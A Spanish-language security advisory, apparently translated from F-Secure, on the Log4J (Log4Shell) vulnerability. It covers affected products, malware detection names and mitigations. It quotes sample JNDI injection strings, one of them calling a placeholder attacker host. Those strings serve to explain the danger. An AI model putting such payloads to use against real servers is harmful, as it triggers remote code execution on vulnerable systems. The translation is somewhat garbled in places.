Ciberseguridad

Lo que necesita saber sobre la vulnerabilidad de Log4J que sacude Internet

Una vulnerabilidad  en la biblioteca Log4J identificado el viernes 10 de diciembre de XX está sacudiendo los proveedores de software y proveedores de servicios en todo el mundo. La debilidad en el método estandarizado para manejar los mensajes de registro dentro del software que va desde Minecraft de Microsoft hasta las plataformas de comercio electrónico ya está siendo atacada por los atacantes .

Es casi imposible describir la cantidad de riesgo que existe en las aplicaciones vulnerables en este momento. Si se registra una cadena controlada por el usuario que apunta a la vulnerabilidad, el exploit se puede ejecutar de forma remota. En los términos más simples, permite que un atacante use esta vulnerabilidad para hacer que el sistema de destino busque y ejecute código desde una ubicación remota. La segunda etapa, lo que hace el código malicioso, depende totalmente del atacante.

Una ‘tormenta casi perfecta’

Esta tormenta casi perfecta es otro recordatorio de lo difícil que es proteger varias capas de software empresarial. El software heredado, incluidas las versiones anteriores de Java, obligará a muchas organizaciones a desarrollar sus propios parches o evitará que apliquen parches de inmediato. Otra complicación proviene del desafío de parchear correctamente las funciones de registro de Log4j en tiempo real, justo cuando la amenaza de ataque es tan alta y el registro es tan esencial.

Todas las mitigaciones recomendadas deben aplicarse ” inmediatamente “, insistió la Agencia de Seguridad de Infraestructura y Ciberseguridad en una publicación de blog.

No hay mucho que los usuarios individuales puedan hacer, aparte de instalar actualizacion

varios servicios en línea a medida que estén disponibles. Sin embargo, las empresas y las empresas trabajarán sin descanso para proporcionar esas correcciones, ya que aseguran sus propios sistemas. Y una vez que se haya solucionado la exposición, se deben tomar medidas para evaluar si se está produciendo un incidente activo dentro de los sistemas afectados.

Vulnerabilidades en casi cualquier lugar

Encontrar una aplicación que no use la biblioteca Log4J puede ser más difícil que encontrar una que sí lo haga. Esta omnipresencia significa que los atacantes pueden buscar vulnerabilidades en casi cualquier lugar.

“Por favor, no cambie el nombre de su Tesla o iPhone a $ {jndi: ldap: // url / a} a menos que desee una experiencia de usuario inesperada”, dijo Erka Koivunen, director de seguridad de la información de F-Secure, medio en broma.

El uso del lenguaje de formato de Log4J podría activar código en aplicaciones vulnerables en todo el mundo. La sola mención de una frase como “$ {jndi: ldap: //attacker.com/pwnyourserver}” en un chat de Minecraft en un sistema sin parches, por ejemplo, podría desencadenar una tormenta de seguridad en Microsoft.

¿Se ven afectados los productos F-Secure?

F-Secure ha identificado que los siguientes productos se ven afectados por esta vulnerabilidad:

  • Administrador de políticas F-Secure
    • Nota : Solo el componente Policy Manager Server se ve afectado. Las instalaciones independientes de Policy Manager Console no se ven afectadas.
  • Proxy de F-Secure Policy Manager
  • Proxy de punto final F-Secure
  • Conector F-Secure Elements

Las versiones de Windows y Linux de estos productos deben considerarse afectadas. Si su producto F-Secure está expuesto a Internet, DEBE verificarlo y parchearlo inmediatamente si es necesario.

¿Cómo puedo parchear mi producto F-Secure?

F-Secure ha creado un parche de seguridad desplegable para esta vulnerabilidad. Puede encontrar esas instrucciones y actualizaciones continuas sobre esta vulnerabilidad aquí .

¿Qué protección ofrece F-Secure contra esta vulnerabilidad?

F-Secure Endpoint Protection (EPP) se actualiza continuamente con la detección de los archivos de exploits locales más recientes, pero dadas las muchas formas en que puede suceder la explotación, esto solo cubre parte del problema.

Las detecciones de EPP abordarán cualquier carga útil observada en la fase posterior a la explotación como de costumbre, y en este momento, F-Secure ha implementado las siguientes detecciones que abordan algunos escenarios de ataque graves. Estos representan cargas útiles maliciosas que hemos visto “en la naturaleza” en relación con las vulnerabilidades de Log4j.

  • TR / Drop.Cobacis.AL
  • TR / Rozena.wrdej
  • TR / PShell.Agent.SWR
  • TR / Coblat.G1
  • TR / AD.MeterpreterSC.rywng

Muchas de estas detecciones han estado disponibles en F-Secure EPP durante meses, lo que significa que los clientes están protegidos de forma proactiva contra estas cargas útiles.

Otras detecciones presentes también pueden ayudar, ya que hay varias formas de usar el exploit. Esta lista de detecciones útiles se actualizará a medida que evolucione la situación.

Las capacidades de F-Secure Endpoint Detection and Response (EDR) son efectivas independientemente de esta vulnerabilidad específica y las actividades maliciosas, particularmente aquellas relacionadas con la post-explotación, se detectarán como normales. Seguiremos agregando nuevas detecciones en función de lo que veamos.

F-Secure Elements Vulnerability Management se actualiza constantemente para agregar detecciones, esta página detalla el estado actual. Se actualizará a medida que haya nuevas detecciones disponibles.

Consulte las recomendaciones generales en la siguiente sección para conocer más mitigaciones.

¿Qué pasos debe tomar en general con todo el software, independientemente del proveedor?

Restrinja el acceso a la red o limítelo a sitios confiables. Si su sistema no puede conectarse a Internet para buscar el código malicioso, el ataque fallará.

Consulte periódicamente con los proveedores para ver si hay información sobre parches y otras mitigaciones relacionadas con las vulnerabilidades.

Considere F-Secure Elements Vulnerability Management , que puede ayudar a identificar sistemas vulnerables.

Considere los productos F-Secure Elements Endpoint Protection o F-Secure Business Suite , que pueden detectar y parchear software vulnerable en el sistema en el que están instalados.

NOTA: La pregunta “¿Qué protección proporciona F-Secure contra esta vulnerabilidad?” La sección se agregó el 12 de diciembre a las 12:49 PM UTC y se actualizó a las 3:13 PM UTC y el 14 de diciembre a las 12:05 PM UTC. “¿Se ven afectados los productos F-Secure?” se actualizó el 13 de diciembre a las 11:46 AM UTC.

Author

Luis Díaz

Leave a comment

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *